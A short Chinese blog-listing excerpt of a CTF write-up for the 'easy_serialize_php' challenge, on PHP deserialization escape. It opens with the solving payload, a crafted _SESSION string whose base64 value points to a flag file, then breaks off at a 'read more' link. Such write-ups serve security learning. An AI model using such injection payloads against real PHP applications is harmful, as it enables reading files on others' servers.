摘要: easy_serialize_php 先给payload: _SESSION['flagphp']=;s:5:"guest";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";} 开始做题(这题是一道PHP反序列化逃逸) 一:审计代码发现phpinfo以及分析源码 为了帮助 阅读全文
posted @ 2021-07-23 15:26 友好邻居 阅读(807) 评论(1) 推荐(0) 编辑